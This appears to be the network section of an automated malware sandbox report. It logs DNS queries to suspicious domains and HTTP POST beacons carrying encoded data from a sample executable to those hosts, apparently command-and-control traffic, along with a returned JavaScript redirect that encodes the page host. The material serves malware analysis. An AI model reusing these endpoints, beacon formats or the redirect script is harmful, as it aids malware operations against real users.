                                                          Jan 11, 2025 01:02:33.329493999 CET4999680192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:33.336777925 CET804999685.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:33.336844921 CET4999680192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:33.353890896 CET4999680192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:33.360186100 CET804999685.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:34.860589027 CET4999680192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:34.867403984 CET804999685.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:34.869539976 CET4999680192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:35.943293095 CET4999780192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:35.951169968 CET804999785.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:35.951257944 CET4999780192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:36.109380007 CET4999780192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:36.116914988 CET804999785.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:36.119307041 CET804999785.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:37.623969078 CET4999780192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:37.628925085 CET804999785.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:37.629014969 CET4999780192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:38.676882029 CET4999980192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:38.683465958 CET804999985.159.66.93192.168.2.6
                                                          Jan 11, 2025 01:02:38.683578968 CET4999980192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:38.707824945 CET4999980192.168.2.685.159.66.93
                                                          Jan 11, 2025 01:02:38.714549065 CET804999985.159.66.93192.168.2.6
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 01:00:45.824686050 CET5582153192.168.2.61.1.1.1
                                                          Jan 11, 2025 01:00:45.831661940 CET53558211.1.1.1192.168.2.6
                                                          Jan 11, 2025 01:00:46.865626097 CET6480753192.168.2.61.1.1.1
                                                          Jan 11, 2025 01:00:46.873528957 CET53648071.1.1.1192.168.2.6
                                                          Jan 11, 2025 01:01:26.389095068 CET6095653192.168.2.61.1.1.1
                                                          Jan 11, 2025 01:01:26.426794052 CET53609561.1.1.1192.168.2.6
                                                          Jan 11, 2025 01:01:42.127949953 CET5836953192.168.2.61.1.1.1
                                                          Jan 11, 2025 01:01:42.591679096 CET53583691.1.1.1192.168.2.6
                                                          Jan 11, 2025 01:01:56.159468889 CET5108153192.168.2.61.1.1.1
                                                          Jan 11, 2025 01:01:56.625801086 CET53510811.1.1.1192.168.2.6
                                                          Jan 11, 2025 01:02:30.659041882 CET5710853192.168.2.61.1.1.1
                                                          Jan 11, 2025 01:02:30.764777899 CET53571081.1.1.1192.168.2.6
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 11, 2025 01:00:45.824686050 CET192.168.2.61.1.1.10x41eStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:00:46.865626097 CET192.168.2.61.1.1.10x1f96Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:26.389095068 CET192.168.2.61.1.1.10xdcf7Standard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:42.127949953 CET192.168.2.61.1.1.10x4b26Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:56.159468889 CET192.168.2.61.1.1.10x1df4Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:02:30.659041882 CET192.168.2.61.1.1.10x23b9Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 11, 2025 01:00:42.307007074 CET1.1.1.1192.168.2.60xfcebNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:00:42.307007074 CET1.1.1.1192.168.2.60xfcebNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:00:45.831661940 CET1.1.1.1192.168.2.60x41eNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:00:46.873528957 CET1.1.1.1192.168.2.60x1f96No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:26.426794052 CET1.1.1.1192.168.2.60xdcf7No error (0)www.nb-shenshi.buzz161.97.142.144A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:42.591679096 CET1.1.1.1192.168.2.60x4b26No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:01:42.591679096 CET1.1.1.1192.168.2.60x4b26No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:42.591679096 CET1.1.1.1192.168.2.60x4b26No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:42.591679096 CET1.1.1.1192.168.2.60x4b26No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:42.591679096 CET1.1.1.1192.168.2.60x4b26No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:01:56.625801086 CET1.1.1.1192.168.2.60x1df4No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:02:30.764777899 CET1.1.1.1192.168.2.60x23b9No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:02:30.764777899 CET1.1.1.1192.168.2.60x23b9No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:02:30.764777899 CET1.1.1.1192.168.2.60x23b9No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                          • pywolwnvd.biz
                                                          • ssbzmoy.biz
                                                          • www.nb-shenshi.buzz
                                                          • www.laohub10.net
                                                          • www.xcvbj.asia
                                                          • www.soainsaat.xyz
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64973154.244.188.17780572C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:00:45.974980116 CET360OUTPOST /exqctojotladvua HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          Host: pywolwnvd.biz
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                          Content-Length: 808
                                                          Jan 11, 2025 01:00:45.975164890 CET808OUTData Raw: 62 82 06 ff f2 32 1c 8c 1c 03 00 00 6f 24 1d 60 8a 22 41 49 fd 58 57 24 b7 34 45 17 1c 1f e0 45 de 23 39 29 de 37 7c 34 82 f9 c4 96 04 00 17 e3 6b 0b 4b fc 43 f3 5e 4b 92 5d 6d c8 19 0a d2 a6 7f 0d 63 a4 9e a5 1a f6 11 f4 a7 3e 97 31 69 fa 30 4b
                                                          Data Ascii: b2o$`"AIXW$4EE#9)7|4kKC^K]mc>1i0K}wsHl^?,^Uiu`gN_!Ab0paF?*tR*3`s/;~%(pI}L,#Nyk=E!Au]RKUgr^
                                                          Jan 11, 2025 01:00:46.673051119 CET413INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:00:46 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: btst=c9d8e757cea1f07df0b72fd97ff8b1c9|8.46.123.189|1736553646|1736553646|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                          Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.64973818.141.10.10780572C:\Users\user\Desktop\uG3I84bQEr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:00:47.220217943 CET357OUTPOST /dwlowhbefckeyd HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          Host: ssbzmoy.biz
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                          Content-Length: 808
                                                          Jan 11, 2025 01:00:47.220243931 CET808OUTData Raw: 04 d6 05 3a 44 56 fa 30 1c 03 00 00 3d 6e 6b 45 0f c1 0f ce 24 54 c9 50 b8 44 37 0e eb c1 00 16 9b 17 06 98 d8 75 62 77 21 b9 26 67 ac d1 dd a9 7b 54 a5 8e cb a7 73 bb c0 a4 c4 dd fe b0 66 2f 31 b3 d6 22 d1 9f c5 4d ca bb 5e 50 66 35 0b 52 dd 1d
                                                          Data Ascii: :DV0=nkE$TPD7ubw!&g{Tsf/1"M^Pf5R-=8R-86&)&R@B~*k1qrld2o"3*C;dW^QCiNzy>:eaabd_d\+0HDZ>>EkMl


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.649967161.97.142.144806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:01:26.450305939 CET502OUTGET /xxr1/?WldT=UFzdV2kX3&9V7X=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.nb-shenshi.buzz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Jan 11, 2025 01:01:27.071369886 CET1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:01:26 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 2966
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: "66cce1df-b96"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                          Jan 11, 2025 01:01:27.071391106 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                          Jan 11, 2025 01:01:27.071408987 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                          Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                          Jan 11, 2025 01:01:27.071420908 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                          Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.64998623.225.159.42806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:01:42.744792938 CET756OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 209
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50
                                                          Data Ascii: 9V7X=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
                                                          Jan 11, 2025 01:01:43.205363989 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.64998723.225.159.42806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:01:45.452917099 CET780OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 233
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6a 42 38 74 7a 56 51 42 2f 6a 61 47 4a 75 64 6d 51 74 2f 79 78 73 46 7a 51 70 44 31 34 34 67 4d 54 4e 46 55 69 35 31 76 61 64 7a 67 3d 3d
                                                          Data Ascii: 9V7X=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGjB8tzVQB/jaGJudmQt/yxsFzQpD144gMTNFUi51vadzg==
                                                          Jan 11, 2025 01:01:45.971529961 CET533INHTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 358
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.64998823.225.159.42806748C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:01:48.006728888 CET1793OUTPOST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1245
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 39 56 37 58 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 55 52 48 6d 37 6e 6b 68 44 67 34 31 6e 63 72 36 66 5a 64 30 54 70 53 46 70 6c 53 31 73 4a 34 7a 4a 46 46 47 51 67 46 48 31 41 77 63 7a 33 4d 30 66 57 2b 76 4c 4f 76 73 4d 66 4e 2f 75 75 52 6a 61 6a 6e 77 6b 32 77 37 42 70 5a 48 48 36 33 71 4e 6e 43 2f 34 44 6d 4d 55 2f 6c 4b 53 66 6a 78 63 4c 63 71 6a 38 34 44 4f 68 51 74 6c 43 6d 68 45 65 47 5a 42 46 50 2b 69 53 36 56 65 7a 55 6f 59 49 2b 78 36 55 43 58 6e 73 4a 55 74 46 32 6e 32 5a 53 54 31 47 76 74 68 35 38 71 4e 65 53 56 6c 73 72 [TRUNCATED]
